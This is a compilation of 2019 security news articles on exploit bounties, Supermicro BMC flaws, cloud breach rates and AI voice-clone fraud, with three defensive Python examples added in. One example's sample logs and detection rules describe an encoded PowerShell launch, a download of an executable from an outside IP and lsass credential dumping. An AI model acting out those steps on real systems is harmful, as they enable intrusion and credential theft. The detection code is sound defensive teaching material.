STE WILLIAMS

Fancy buying a compact and bijou cardboard box home in a San Francisco alley? This $2.5m Android bounty will get you nearly there

Bug-broker Zerodium says it will cough up as much as $2.5m in exchange for techniques to silently and remotely hijack Android devices via critical vulnerabilities, signaling a major change in the pricing of security holes.

A new payment structure revealed on Tuesday made clear that flaw-hunters who hook Zerodium up with proof-of-concept full-chain exploits against Google’s operating system can claim the $2.5m top prize. Meanwhile, payouts for iOS bugs, which had been considered much more valuable, have been cut by as much as half.

Zerodium did not say what the reasoning was for the move, though the announcement comes in the wake of reports that a handful of critical iOS and Android zero-days were used by the Chinese government to spy on Uyghur Muslims over the course of two or more years. Pseudonymous infosec guru and ex-exploit-broker The Grugq suggested there is right now too much attention on iOS, and too many exploits available to those willing to pay for them, and so Zerodium is upping the price for a rare item – a reliable full-chain Android hijack exploit – to generate and reward interest.

To qualify for the massive payout, the hacker will have to show that the Android device can be fully compromised without any user interaction – such as opening a file – and with persistence, meaning the compromise must survive a restart. It’s not easy money. Such exploit chains are hard to build on Android, where applications are usually locked away in a sandbox that makes system-level remote code execution tricky, though not impossible, to achieve.

This is the first time Zerodium has offered a bounty for full-chain Android pwnage. Previous payments were limited to Chrome remote code execution and local privilege escalation flaws, each carrying a maximum payout of $500,000. The new bounty makes Android the most valuable target in Zerodium’s bug-buying program. A comparable zero-click full chain bug in iOS will garner a $2m payout, while a zero-click RCE in Windows brings a maximum payment of $1m.

“The amounts paid by Zerodium to researchers to acquire their original zero-day exploits depend on the popularity and security level of the affected software/system, as well as the quality of the submitted exploit (full or partial chain, supported versions/systems/architectures, reliability, bypassed exploit mitigations, default vs. non-default components, process continuation, etc),” the bug broker notes.


In addition to upping the price for Android exploits, Zerodium says it will be bumping up the payouts for zero-click WhatsApp and iMessage remote code and privilege escalation from $1m to $1.5m.

Meanwhile, those looking to cash in on iOS vulnerabilities are in for some bad news, as Zerodium is cutting the payout for one-click (requiring the user to open a file) iOS and iMessage flaws from $1.5m and $1m, respectively, to $1m and $500,000.

Payouts for desktop and server exploits are unchanged.

The announcement comes just a week after Google expanded its bug bounty program for Android code and popular apps that run on it, although to nowhere near the prices Zerodium is offering. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/09/04/zerodium_android_bug/

7 Steps to Web App Security

Emerging technologies are introducing entirely new ways to reach, act, and interact with people. That makes app security more important than ever.

Image Source: tashatuvango

For more than two decades, Web apps were built with functionality in mind. Everything revolved around the user interface and how easy it was for users to access information and make online purchases.

No longer. The high-profile breaches of the past few years have shattered those assumptions, and companies can no longer trade off functionality for security. Today, both app security and privacy must be built into Web applications.

Setu Kulkarni, vice president of corporate strategy and business development at WhiteHat Security, says it all starts with CISOs explaining in clear terms what lackluster app security means to the company’s bottom line.

And while it’s important for CEOs to understand what’s at stake in terms of lost revenue and brand reputation, security pros are the ones who have to “own” security, Kulkarni says. “That means moving from merely responding to breaches [to mainstreaming] security into IT project teams and the entire development process,” he says.

This feature offers security pros some ideas for mainstreaming app security at their organizations. Security, after all, can’t be an afterthought. It has to become a part of the company’s culture, just as important to the product as quality control.

 

 

Steve Zurier has more than 30 years of journalism and publishing experience, most of the last 24 of which were spent covering networking and security technology. Steve is based in Columbia, Md. View Full Bio

Article source: https://www.darkreading.com/analytics/7-steps-to-web-app-security/d/d-id/1335695?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

3 Promising Technologies Making an Impact on Cybersecurity

The common thread: Each acts as a force multiplier, adding value to every other security technology around it.

A few weeks ago, while attending Black Hat 2019, I was invited to participate in a Dark Reading technology panel hosted by editor Tim Wilson. The discussion focused on new types of technologies that can truly improve cybersecurity defenses.

My first instincts were to go with some of the product categories I research daily. For example, I could have described how machine learning algorithms can improve security analytics or vulnerability management. I might have expounded upon how SOAR (security orchestration, automation, and response) platforms can help organizations automate manual processes and streamline security operations. Similarly, I thought about breach and attack simulation tools that can help identify risk and lead to continuous assessment and security improvement.

Yup, these technologies show great promise, but there is also a lot of hype around each. Furthermore, while enterprise organizations are using them, processes and technologies themselves remain immature. CISOs can achieve benefits with these technologies, but most that I’ve talked to are proceeding slowly and cautiously.

Given this reality, I had to take a step back and really think about technologies I consider ground breaking. It wasn’t easy, but I came up with three non-intuitive technologies that are truly making a difference to cybersecurity professionals.

Promising Technology 1: Apache Kafka. According to ESG research, 77% of enterprise organizations collect, process, and analyze more security data than they did two years ago. What kind of data? Everything: log data, network packets and flows, cyber threat intelligence, application data, cloud telemetry, and more. This makes sense for continuous security monitoring, but moving and processing real-time data streams requires a highly scalable data pipeline. Enter Apache Kafka, a community distributed event streaming platform (first developed by LinkedIn) capable of handling trillions of events a day.

Apache Kafka provides a publish/subscribe messaging bus for terabytes of security telemetry and then feeds it to numerous analytics engines in real time. Thus, Apache Kafka (and other tools, such as RabbitMQ) can help enable more rapid threat detection and response. When I first discovered Apache Kafka, it was being used in grassroots development efforts, but vendors have taken notice since then. In 2018, Splunk released a connector for Kafka, and other SIEM and security analytics vendors are also getting involved. We can’t collect, process, analyze, and act upon security telemetry without a high-performance, highly scalable, and well-managed data pipeline. Apache Kafka is making a real difference in this area.

Promising Technology 2: The MITRE ATT&CK Framework (MAF). Let’s face it, MITRE has had some swings and misses over the years, producing complex technology frameworks that never gained acceptance outside of the US federal government. (FCAPS comes to mind.) Why is MAF different? As Sun Tzu stated, “If you know the enemy and know yourself, you need not fear the result of a hundred battles.” In many cases, cybersecurity analysts knew a lot about themselves but not nearly as much about their enemy, so they tended to address each security incident individually rather than look for patterns of attack. Lockheed Martin helped change cybersecurity thinking in 2011 with its introduction of the “kill chain,” but security teams needed advanced threat intelligence and security analysis skills to map security events into Lockheed’s model.

MAF bridges this gap by acting as the “glue,” allowing analysts to contextualize and visualize individual events along kill chains and giving them detailed instructions on where to look next to uncover broader cybersecurity attacks. With its growing user popularity, it’s not surprising that MAF support is becoming ubiquitous across security analytics tools of all types. Following Sun Tzu’s wisdom, MAF forces cybersecurity analysts to think like a cybersecurity adversary. No wonder it is having such a profound impact.
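The kind of "glue" described above can be shown in a few dozen lines. The following is an added example written for this page, not code from the article or from MITRE: it maps a handful of constructed log events to ATT&CK technique IDs with simple regex rules, lays them out in tactic order so the chain becomes visible, and reports which tactics have no evidence yet (where to look next). The technique IDs and their tactics are real ATT&CK entries, but the subset, the tactic ordering, the rules and the sample events are illustrative assumptions, not a complete or authoritative mapping.

```python
"""Lay security events out along ATT&CK tactics so a chain, not isolated alerts, appears.

Added example, not the article's code. Sample events, rules and the
technique subset are constructed for illustration.
"""
import re
from collections import OrderedDict

# Constructed sample telemetry: (timestamp, host, event text). Not real logs.
SAMPLE_EVENTS = [
    ("09:01", "ws-17", "Outlook opened attachment invoice.docm from external sender"),
    ("09:02", "ws-17", "winword.exe spawned powershell.exe -enc JABzAD0A..."),
    ("09:03", "ws-17", "powershell.exe downloaded http://203.0.113.9/up.exe"),
    ("09:10", "ws-17", "lsass.exe memory read by procdump64.exe"),
    ("09:15", "ws-17", "logon type 3 to srv-fs01 as CORP\\svc_backup"),
]

# Illustrative subset of ATT&CK: technique id -> (name, tactic used here).
# A real deployment loads the full matrix from MITRE's published STIX data.
TECHNIQUES = {
    "T1566": ("Phishing", "Initial Access"),
    "T1059": ("Command and Scripting Interpreter", "Execution"),
    "T1105": ("Ingress Tool Transfer", "Command and Control"),
    "T1003": ("OS Credential Dumping", "Credential Access"),
    "T1021": ("Remote Services", "Lateral Movement"),
    "T1053": ("Scheduled Task/Job", "Persistence"),
}

# Tactic order, roughly left to right as on the ATT&CK matrix.
TACTIC_ORDER = ["Initial Access", "Execution", "Persistence", "Credential Access",
                "Lateral Movement", "Command and Control"]

# Constructed detection rules: regex over the event text -> technique id.
RULES = [
    (re.compile(r"attachment .*\.(docm|xlsm|js) from external", re.I), "T1566"),
    (re.compile(r"spawned (powershell|cmd|wscript)\.exe", re.I), "T1059"),
    (re.compile(r"downloaded https?://", re.I), "T1105"),
    (re.compile(r"lsass\.exe memory read", re.I), "T1003"),
    (re.compile(r"logon type 3 to \S+", re.I), "T1021"),
    (re.compile(r"scheduled task created", re.I), "T1053"),
]


def map_event(text):
    """Return the ATT&CK technique id for one event, or None if no rule matched."""
    for pattern, technique in RULES:
        if pattern.search(text):
            return technique
    return None


def build_chain(events):
    """Group mapped events by tactic in matrix order.

    Returns an OrderedDict: tactic -> list of (timestamp, host, technique_id),
    with tactics that have no evidence left out.
    """
    chain = OrderedDict((tactic, []) for tactic in TACTIC_ORDER)
    for ts, host, text in events:
        technique = map_event(text)
        if technique is None:
            continue
        _, tactic = TECHNIQUES[technique]
        chain[tactic].append((ts, host, technique))
    return OrderedDict((t, evs) for t, evs in chain.items() if evs)


def next_places_to_look(chain):
    """Tactics with no evidence yet: the gaps an analyst should hunt in next."""
    return [t for t in TACTIC_ORDER if t not in chain]


if __name__ == "__main__":
    chain = build_chain(SAMPLE_EVENTS)
    for tactic, evs in chain.items():
        ids = ", ".join(f"{tid} ({TECHNIQUES[tid][0]})" for _, _, tid in evs)
        print(f"{tactic:20s} {ids}")
    print("no evidence yet for:", next_places_to_look(chain))
```

Run on the constructed events, the output shows five tactics populated in order and flags Persistence as the gap, which is exactly the "where to look next" prompt the framework gives an analyst.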

Promising Technology 3: OpenC2. This OASIS standard is a bit more esoteric than Apache Kafka or MAF, and in truth it really hasn’t had an impact yet. However, in my humble opinion, it holds great potential. OpenC2 creates an abstraction layer for standardizing communications and instructions for security controls. For example, suppose an organization receives high-fidelity threat intelligence that a specific IP address is malicious. The immediate response would be to block this IP address across all security controls. With existing security technologies, this could mean translating this rule into vendor-specific syntax, which can get cumbersome in a large heterogeneous enterprise. This is why SIEM, SOAR, and TIP vendors (among others) spend so much time and effort developing connectors and building partner ecosystems.

OpenC2 could alleviate this translation problem through common standards. Rather than individual connectors, security controls such as endpoint security software, firewalls, proxies, DNS services, etc., would talk OpenC2, so analytics engines could issue a single rule for all relevant security controls. I believe this standardization could really help automate, accelerate, and scale data-driven security processes.
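To make the translation problem concrete, here is an added example (written for this page, not from the article and not an official OASIS OpenC2 implementation) in which one "deny this IPv4 range" command is rendered into the native syntax of several controls through small adapters. The command shape (action, target, args) follows the OpenC2 Language Specification v1.0; the adapter classes, the control names, the rule strings and the sample command are constructed for illustration. One adapter deliberately represents a control that cannot act on an IPv4 target, because a real dispatcher has to report that rather than silently skip it.

```python
"""Dispatch one OpenC2-style command to several heterogeneous security controls.

Added example, not the article's code and not an OASIS reference
implementation. Adapters, control names and the sample command are
constructed for illustration.
"""
import ipaddress
import json


class Adapter:
    """Base class: each control knows how to render a supported command."""
    name = "generic"

    def deny_ipv4_net(self, cidr, args):
        raise NotImplementedError


class IptablesAdapter(Adapter):
    name = "iptables-host"

    def deny_ipv4_net(self, cidr, args):
        # Insert at the top of INPUT so the block wins over existing accepts.
        return f"iptables -I INPUT -s {cidr} -j DROP"


class NftablesAdapter(Adapter):
    name = "nftables-gateway"

    def deny_ipv4_net(self, cidr, args):
        return f"nft add rule inet filter input ip saddr {cidr} drop"


class PfAdapter(Adapter):
    name = "pf-edge"

    def deny_ipv4_net(self, cidr, args):
        return f"block in quick from {cidr}"


class DnsSinkholeAdapter(Adapter):
    """A DNS control cannot act on an IPv4 target; it says so instead of guessing."""
    name = "dns-rpz"

    def deny_ipv4_net(self, cidr, args):
        return None


CONTROLS = [IptablesAdapter(), NftablesAdapter(), PfAdapter(), DnsSinkholeAdapter()]

# The (action, target type) pairs this dispatcher understands: a subset of OpenC2.
SUPPORTED = {("deny", "ipv4_net")}


def validate(command):
    """Check the command against the supported subset; return (action, target_type, cidr)."""
    action = command.get("action")
    target = command.get("target", {})
    if len(target) != 1:
        raise ValueError("OpenC2 command must carry exactly one target")
    (target_type, value), = target.items()
    if (action, target_type) not in SUPPORTED:
        raise ValueError(f"unsupported action/target: {action}/{target_type}")
    # Normalise the network and reject garbage before it reaches any control.
    net = ipaddress.IPv4Network(value, strict=False)
    return action, target_type, str(net)


def dispatch(command, controls=CONTROLS):
    """Translate one validated command for every control.

    Returns {control_name: native rule string, or None if the control cannot act}.
    """
    action, target_type, cidr = validate(command)
    args = command.get("args", {})
    results = {}
    for control in controls:
        handler = getattr(control, f"{action}_{target_type}")
        results[control.name] = handler(cidr, args)
    return results


# Constructed command: threat intel says this host is malicious, block it everywhere.
SAMPLE_COMMAND = json.loads("""
{
  "action": "deny",
  "target": {"ipv4_net": "198.51.100.7/32"},
  "args": {"response_requested": "complete"}
}
""")

if __name__ == "__main__":
    for name, rule in dispatch(SAMPLE_COMMAND).items():
        print(f"{name:18s} {rule if rule else '(cannot act on ipv4_net)'}")
```

The point of the design is that the analytics engine emits one command and never learns vendor syntax; adding a control means adding one adapter, not another connector per data source. Validation happens once, centrally, so a malformed target cannot reach any control.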

There’s a common pattern with all three technologies: Each one acts as a force multiplier, adding value to every other security technology around it. This alone could make them extremely beneficial for CISOs and enterprise organizations.


Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “‘It Saved Our Community’: 16 Realistic Ransomware Defenses for Cities.”

Jon Oltsik is an ESG senior principal analyst, an ESG fellow, and the founder of the firm’s cybersecurity service. With over 30 years of technology industry experience, Jon is widely recognized as an expert in all aspects of cybersecurity and is often called upon to help … View Full Bio

Article source: https://www.darkreading.com/risk/3-promising-technologies-making-an-impact-on-cybersecurity/a/d-id/1335684?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

‘It Takes Restraint’: A Seasoned CISO’s Sage Advice for New CISOs

Todd Fitzgerald wrote the books on being a chief information security officer. Here he offers tips on what to do and what not to do in the first few months of a new CISO job.

(Image Source: bizvector via Adobe Stock)

Todd Fitzgerald is a builder. An information security leader for more than 20 years (and an IT pro for even longer) he has encountered a common theme in his career: He’s the guy who is asked to create programs from scratch.

He started the software life cycle development program in one organization. The data-modeling initiative in another. As he moved from industry to industry, and from one Fortune 500 company to another, he helped launch many organizations’ initial security efforts. 

“I’m used to being the CISO walking in the door for the first time and getting things off the ground,” says Fitzgerald, now managing director of CISO Spotlight. His latest book, “CISO COMPASS: Navigating Cybersecurity Leadership Challenges with Insights from Pioneers,” was published late last year. He is also co-author of “(ISC)2 CISO Leadership: Essential Principles for Success” and “Information Security Governance Simplified: From the Boardroom to the Keyboard,” and co-author of the EC-Council’s “CISO Body of Knowledge.”

What has Fitzgerald learned in more than two decades? Go slowly. There are vital steps to take before a security manager should even think about change.

As more organizations invest in security, the role of the chief information security officer is growing and evolving. But those CISOs who fill roles often don’t stay long. A recent survey of CISOs from Nominet found the majority of CISOs said average job length was less than three years (55%), with nearly one-third (30%) saying less than two years.

In a role that often offers only a short time to make an impact, where should these security managers start when they first arrive in an organization?

A New CISO’s First Priority: Listening
Practice patience. “It takes restraint to not suggest solutions in those first few weeks,” Fitzgerald says. “But I think one of the most important things to do first is understand the culture of the organization.”

A period of listening and observing is paramount to comprehend why things are being done the way they are, he says. Preconceived notions will only hinder your efforts to understand what makes employees tick, he says.

“There may be a whole lot of reasons why the environment is the way it is,” Fitzgerald says. “If you go in there and start to make observations that are critical, you don’t know who it is you might offend. You really do have to listen to how things got the way they are.”

It is also a time to understand where the security department has been and what changes might be expected going forward.

“Was there a recent data breach? Why are you there? Why is your predecessor gone?” he advises asking.

Meet Your Team
Plan to have one-on-one meetings with your direct reports to understand their strengths, weaknesses, and insights on security strategy. Tap their institutional knowledge and build trust so they know they can come to you with concerns and feedback.

It’s also a time to get to know the multigenerational workforce dynamics on the team. Fitzgerald devotes an entire chapter of his latest book to the topic.

In a blog post from Ken Xie, CEO of Fortinet, he notes there are now three generations of security workers. The first generation founded initial security efforts and departments and were focused on securing network connections with legacy tools and strategies. The second generation of security continued to protect traditional networks in new ways. Now a third generation is emerging to protect digital organizations. 

Each of these security team members will bring different perspectives about the mission and goals of your security efforts. It is important to understand each of them by taking the time to have listening sessions.

“When I have done these sessions with people, we wind up with a greater understanding of one another,” Fitzgerald says. “I think it is really important to get to know each other before you can get things done.”

Build Bonds Outside Security
Beyond the core security team, those first few months are also a time to build connections with key stakeholders outside of security. Sit down with leaders and decision makers in finance, human resources, marketing, and other lines of business.

Fitzgerald advises putting together a short but informative presentation that can be used to engage senior leaders around the business.

“I would go around to all senior executives, managers, and staff and put together a 20-minute PowerPoint presentation on what I do and what I think my role is,” he says. “Then listen to their concerns about what they have seen work, what they have not. It’s a great time to not push your agenda, but to really build relationships.”

Focus on Driving the Business 
With those executive and management meetings under your belt, it’s time to shift focus to how the security department will not only defend critical data and assets, but add value and further the business mission.

Return on investment matters for security today, and CISOs are increasingly asked to demonstrate that whenever they make the case for budget. While it may not be possible to measure direct ROI for every aspect of cybersecurity, the end goal is to optimize investments through a combination of people, processes, and technology. CISOs should plan to create a road map for their next few months with these objectives in mind, Fitzgerald says.

“This starts by recognizing management is motivated by their own goals,” he explains. “There has to be an honest attempt to try and understand what the major initiatives are for them. What do they want to do this year? How can security make that easier for them?”

Finally, Make an Action Plan 
Within 60 days, new CISOs should establish a draft action plan. Look at it merely as a draft of your vision, open to revision.

Then, according to Fitzgerald, share that strategy and invite feedback from other stakeholders in the organization. And be ready to make changes. Your security strategy will always be a work in progress. 

“People want to know what are you going to do for them,” Fitzgerald says. “And you need to start there when you’re explaining your plans to them.”


Joan Goodchild is a veteran journalist, editor, and writer who has been covering security for more than a decade. She has written for several publications and previously served as editor-in-chief for CSO Online. View Full Bio

Article source: https://www.darkreading.com/edge/theedge/it-takes-restraint-a-seasoned-cisos-sage-advice-for-new-cisos-/b/d-id/1335716?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Over 47K Supermicro Corporate Servers Vulnerable to Attack

At least 47,000 Supermicro servers are vulnerable to attack and compromise over the Internet via several security vulnerabilities in a remote monitoring and management component on the systems.

Supermicro has urged organizations using its X9, X10, and X11 platforms to block the port through which attacks can be carried out while the company works on getting a security fix issued.

The vendor has also asked impacted organizations to ensure that the vulnerable component is operating on an isolated private network and is not directly exposed to the Internet. The precaution “would reduce but not eliminate the identified exposure,” Supermicro said in an advisory Tuesday.

The vulnerabilities – discovered by security vendor Eclypsium – exist in the baseboard management controllers (BMC) of Supermicro servers. They give attackers a way to remotely connect to a server, mount a virtual USB CD/DVD drive, and carry out a variety of activities including loading a new operating system image, modifying settings, dropping malware, or disabling the device entirely.

A BMC is an embedded component that allows administrators to do out-of-band monitoring and management of servers. BMCs have direct access to the motherboard of the host system and enable actions like remote rebooting, remote OS reinstallation, and remote log analysis. Most servers ship with a BMC.

“BMCs are highly privileged devices in modern systems that [also] have a poor security track record,” says Rick Altherr, principal engineer at Eclypsium. Security researchers are actively looking for ways to attack BMCs because of their reputation for being riddled with vulnerabilities, he says. Over the years security researchers have discovered weaknesses in BMCs from HP, Dell, IBM, Supermicro, Oracle, Fujitsu, and others.

“End users should treat them [BMCs] as vulnerable and take steps to protect them on their network,” Altherr says. “For the future, server vendors need to hear from customers that BMC security is important and needs to be addressed.”

According to Eclypsium, the problem it found has to do with how the BMCs on Supermicro’s X9, X10, and X11 servers implement a virtual media function, which lets users and administrators connect remotely over TCP port 623 and present a disk image to the system as a virtual USB CD or DVD drive.

Authentication Weaknesses

What Eclypsium’s researchers discovered is that the virtual media service on the Supermicro BMCs allows plain-text authentication and sends traffic unencrypted, or only weakly encrypted, between the client and server.

The BMCs on Supermicro’s X10 and X11 platforms also allow for authentication bypass entirely. Eclypsium’s researchers found that when a client is properly authenticated to the virtual media service on these devices and disconnects, crucial details about that client’s session are left intact. When a new client connects, it inherits the previous client’s authorizations even if the new client attempts access using incorrect authentication credentials.

Together, the weaknesses give attackers a way to relatively easily gain access to a server and plug a virtual USB into it and carry out different types of malicious activity, Eclypsium said this week. Because of how Supermicro has implemented the virtual media service, an attacker can virtually mount any USB device to the server.

Attackers can gain access using a legitimate user’s authentication packet by exploiting default credentials or in some cases, by bypassing authentication entirely, the security vendor said.
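The authentication-bypass behaviour described above is a generic session-state bug, and it is worth seeing in miniature. The following is an added example written for this page: it is not Eclypsium's or Supermicro's code and does not model the real BMC virtual-media protocol. It is an in-process toy with two services: one keeps a single service-wide "authorized" flag that disconnect() never clears, so the next connection inherits the previous client's authorization even with a wrong password; the other keeps per-connection session tokens and destroys the whole session on disconnect. The credential store, client names and passwords are constructed.

```python
"""Toy model of a virtual-media service: stale shared authorization beside a fixed version.

Added example, not Eclypsium's or Supermicro's code and not the real BMC
protocol. Credentials, client ids and image names are constructed.
"""
import hashlib
import hmac
import secrets

# Constructed credential store: username -> salted password hash.
SALT = b"constructed-salt"
USERS = {"admin": hashlib.sha256(SALT + b"correct-horse").hexdigest()}


def check_password(user, password):
    """Constant-time comparison of the presented password against the stored hash."""
    expected = USERS.get(user)
    if expected is None:
        return False
    digest = hashlib.sha256(SALT + password.encode()).hexdigest()
    return hmac.compare_digest(digest, expected)


class VulnerableVirtualMedia:
    """Authorization lives in one service-wide slot; disconnect() never resets it."""

    def __init__(self):
        self.authorized = False      # shared across all connections: the bug
        self.client = None

    def connect(self, client_id, user, password):
        self.client = client_id
        if check_password(user, password):
            self.authorized = True
        # On a failed login the stale True from the last client is left in place.
        return "handle"              # no per-session state behind this handle

    def mount(self, handle, image):
        if not self.authorized:
            raise PermissionError("not authenticated")
        return f"{self.client} mounted {image}"

    def disconnect(self, handle):
        self.client = None           # forgets who was connected, not whether they were authorized


class FixedVirtualMedia:
    """Per-connection sessions; a failed login gets no session and disconnect destroys it."""

    def __init__(self):
        self.sessions = {}           # token -> client_id

    def connect(self, client_id, user, password):
        if not check_password(user, password):
            return None
        token = secrets.token_hex(16)
        self.sessions[token] = client_id
        return token

    def mount(self, token, image):
        client = self.sessions.get(token)
        if client is None:
            raise PermissionError("not authenticated")
        return f"{client} mounted {image}"

    def disconnect(self, token):
        self.sessions.pop(token, None)


def replay_scenario(service_cls):
    """A legitimate admin logs in and leaves; an attacker then connects with a bad password.

    Returns True if the attacker managed to mount an image, False otherwise.
    """
    svc = service_cls()
    token = svc.connect("admin-workstation", "admin", "correct-horse")
    svc.disconnect(token)
    attacker_token = svc.connect("attacker", "admin", "wrong-password")
    try:
        svc.mount(attacker_token, "evil.iso")
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    print("vulnerable service lets attacker mount:", replay_scenario(VulnerableVirtualMedia))
    print("fixed service lets attacker mount:     ", replay_scenario(FixedVirtualMedia))
```

The fix is not cleverer authentication but correct lifecycle handling: authorization must be bound to the session object that is created on successful login and torn down on disconnect, so nothing about a previous client survives for the next one to inherit.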

An Eclypsium scan of TCP port 623 showed there are more than 47,330 BMCs with the vulnerable virtual-media services that are publicly accessible. Many other vulnerable systems likely exist that are not directly accessible from the Internet, but can be exploited by attackers with access to a corporate network, Eclypsium said.

A majority of the vulnerable systems belong to US-based organizations, says Altherr.

In all, the security vendor discovered over 92,000 BMCs that are discoverable over the Internet, including the over 47,300 servers with the vulnerable virtual-services component.


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/over-47k-supermicro-corporate-servers-vulnerable-to-attack/d/d-id/1335717?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Multicloud Businesses Face Higher Breach Risk

A new report finds 52% of multicloud environments have suffered a breach within the past year, compared with 24% of hybrid cloud users.

More than half of firms running multicloud environments have been hit with a data breach in the past year, compared with 24% of hybrid cloud organizations and 24% of single-cloud users.

To gain a better understanding of how the public and private sectors are engaging with the $325 billion cloud market, researchers with Nominet polled 274 CISOs, CTOs, CIOs, and other professionals responsible for cybersecurity in large organizations across the US and UK. While 61% believe the risk of a breach is the same or lower in the cloud compared with on-prem environments, it seems there is a link between the number of clouds used and risk of attack.

The majority (71%) of respondents use software-as-a-service (SaaS) and 60% use infrastructure-as-a-service (IaaS). Fewer have moved to platform-as-a-service (PaaS) or business-process-as-a-service (BPaaS). Nearly half (48%) report their organizations use a multicloud approach, and 24% use hybrid cloud. Only 29% of respondents use cloud services from one provider. Google Cloud was the most popular (56%), followed by IBM (49%), Oracle (44%), Microsoft Azure (36%), and AWS (32%).

Businesses using a multicloud approach are both more likely to have experienced a breach and more likely to have suffered multiple breaches: Sixty-nine percent of multicloud businesses report 11 to 30 breaches, compared with 19% of single-cloud organizations and 13% of hybrid cloud users.

Nominet vice president Stuart Reed points to a “tipping point” in terms of cloud adoption as more businesses consider the potential risks involved. Still, 69% remain moderately, very, or extremely worried about cloud security. Most fear cybercriminal sophistication and customer data exposure; other trepidations relate to increased attack surface, Internet of Things devices, and visibility.

These concerns no longer block cloud adoption as organizations recognize the cloud’s potential to drive growth. “I think a lot of major SaaS applications are finding their way into enterprises as a matter of course now,” Reed says. “We’re beyond the point of people ‘dipping their toe’ in.” Organizations are no longer settling on one cloud; more of them now use two or more.

“There is a huge amount of choice out there in the market, from a cloud perspective,” Reed says. “Organizations, generally speaking, have varied requirements depending on the project [they’re] doing.” A cloud service that works for one project may not work for another, for example, or have different geographical requirements. Companies’ solution is to use several.

The higher likelihood of a breach for multicloud businesses has less to do with the security of each provider and more to do with heightened complexity. Each new cloud service increases the number of touch points onto a network, expanding opportunities for an attacker to get in.

“The traditional view of the network is becoming increasingly dissolved,” he continues. “The network becomes broader, wider, and more significant. The need to be able to have a good level of visibility across that is highly important.”

Navigating the Complexity of Cloud
For businesses working to secure existing multicloud environments, or those considering an additional cloud provider, Reed advises taking inventory of where assets reside and understanding the full breadth of the clouds in use. Knowing where data passes and how it reaches other parts of the network or the Internet is what gives an organization the visibility to understand what normal behavior looks like.

Nearly two-thirds of respondents (63%) already outsource cloud security to managed service providers, Nominet found. For organizations considering outsourcing, Reed emphasizes the importance of asking the right questions. Understand what they are able to offer and the security processes and procedures in place. This creates clarity between the supplier and organization in terms of what should happen when a breach is identified and how to mitigate it.

“It’s the same level of diligence they need to apply to any supplier,” he says.

Most (57%) respondents expect their cloud security budgets to increase, researchers found; the only industries where budgets are expected to fall are pharmaceuticals and hospitality. Budget increases could signify a more security-conscious organization, they report, or a response to an incident. Respondents are more likely to expect cloud security budgets to increase if their organization had been hit with a cyberattack in the 12 months prior.


Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/cloud/multicloud-businesses-face-higher-breach-risk/d/d-id/1335719?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Cybercriminals Impersonate Chief Exec’s Voice with AI Software

Scammers leveraged artificial intelligence software to mimic the voice of a chief executive and successfully request $243,000.

Fraudsters are constantly looking for new ways to scam their victims. One unique case gives the security industry a glimpse of what they could do with artificial intelligence (AI) and voice recording.

As part of an incident in March, an attacker called the CEO of a UK-based energy business pretending to be the head of its German parent company. Analysts believe AI-based software was used to impersonate the chief executive’s voice, as it had the slight German accent and other qualities the UK CEO recognized in his boss’s voice — qualities that led him to believe the call was legitimate. The caller issued an “urgent” request to the CEO, demanding he transfer $243,000 to a Hungarian supplier within an hour’s time.

The transfer went through and the money was later moved to other countries. Scammers continued to contact the UK company and make additional payment requests, according to Euler Hermes, the organization’s insurer. However, the CEO grew suspicious and did not transfer the funds.

While this incident is still under investigation, the Wall Street Journal cites officials saying this impersonation attack is the first in which fraudsters “clearly” leveraged AI to mimic someone’s voice. It’s believed this technology could make it easier for scammers to manipulate enterprise victims, complicating matters for defenders who don’t yet have the technology to detect them.

Read more details here.


Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/risk/cybercriminals-impersonate-chief-execs-voice-with-ai-software/d/d-id/1335722?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

iPhone attack may have targeted Android and Windows too

Last week’s significant hack of iPhones also targeted Android smartphones and Windows computers, it has been reported.

Google dropped hints about nation-state involvement in its announcement, but a separate report that Windows and Android devices were also on the target list offers a new twist to the story.

If correct, the inclusion of Windows and Android shouldn’t be surprising: when targeting specific groups of people through a small set of websites, it makes sense to cover as many kinds of computing device as possible so as not to miss anyone.

Of course, none of this can currently be verified. For now, these are simply unnamed sources talking to a few journalists, offering information that might never be confirmed.

Indeed, the fact that it is being taken seriously at all is partly down to the fact that the companies involved – Google, Microsoft, Apple – seem unwilling to deny any of it.

Deeper meaning

However, another way of understanding this story is to point out that the who and why is less important than the how.

Underscoring this is that Google’s original report mentions that unintended victims were also caught up in the attacks, which implies that anyone could be a victim of a future campaign.

Victims were reportedly infected with spyware after being persuaded to open a malicious link – a generic but effective tactic.

Reportedly, the infected domains were indexed by Google search (perfectly normal if the domain is not known to be malevolent), which prompted the FBI to ask the company to delist them.

The first issue is what has been done for the victims, both those targeted and those infected as collateral damage.

The campaign was discovered early in 2019, the iPhone vulnerabilities involved are known to have been fixed since then, and Apple’s process for deploying patches is well oiled. If Android or Windows devices were involved, though, the patching timeline becomes less certain because updates might be optional and slow to appear.

Flaws for sale

The risk is that when nation-state groups uncover flaws worth exploiting, and don’t report them, it creates breathing space for professional cybercriminals to discover them too (or, if they can’t, steal them).

Adding to this is the problem of software companies that write spyware for a living selling their tools to intelligence services, countries and, controversially, commercial organisations. At times it can seem as if the two types of attack – targeted nation-state malware and commercial spyware – are merging into one industry.

There’s no evidence that commercial spyware was connected to the latest iPhone campaign, but the sector’s growth may have caused the price attached to zero-day vulnerabilities to rise.

Companies like Google, Apple and Microsoft operate bug bounty programs in part to compete with the illicit market in vulnerabilities, and Apple recently raised its top bug bounty to $1 million.

This market can be contained but not easily stopped. When hackers can rely on a plentiful tool chest full of flaws, we all have something to lose, no matter who is behind an attack.

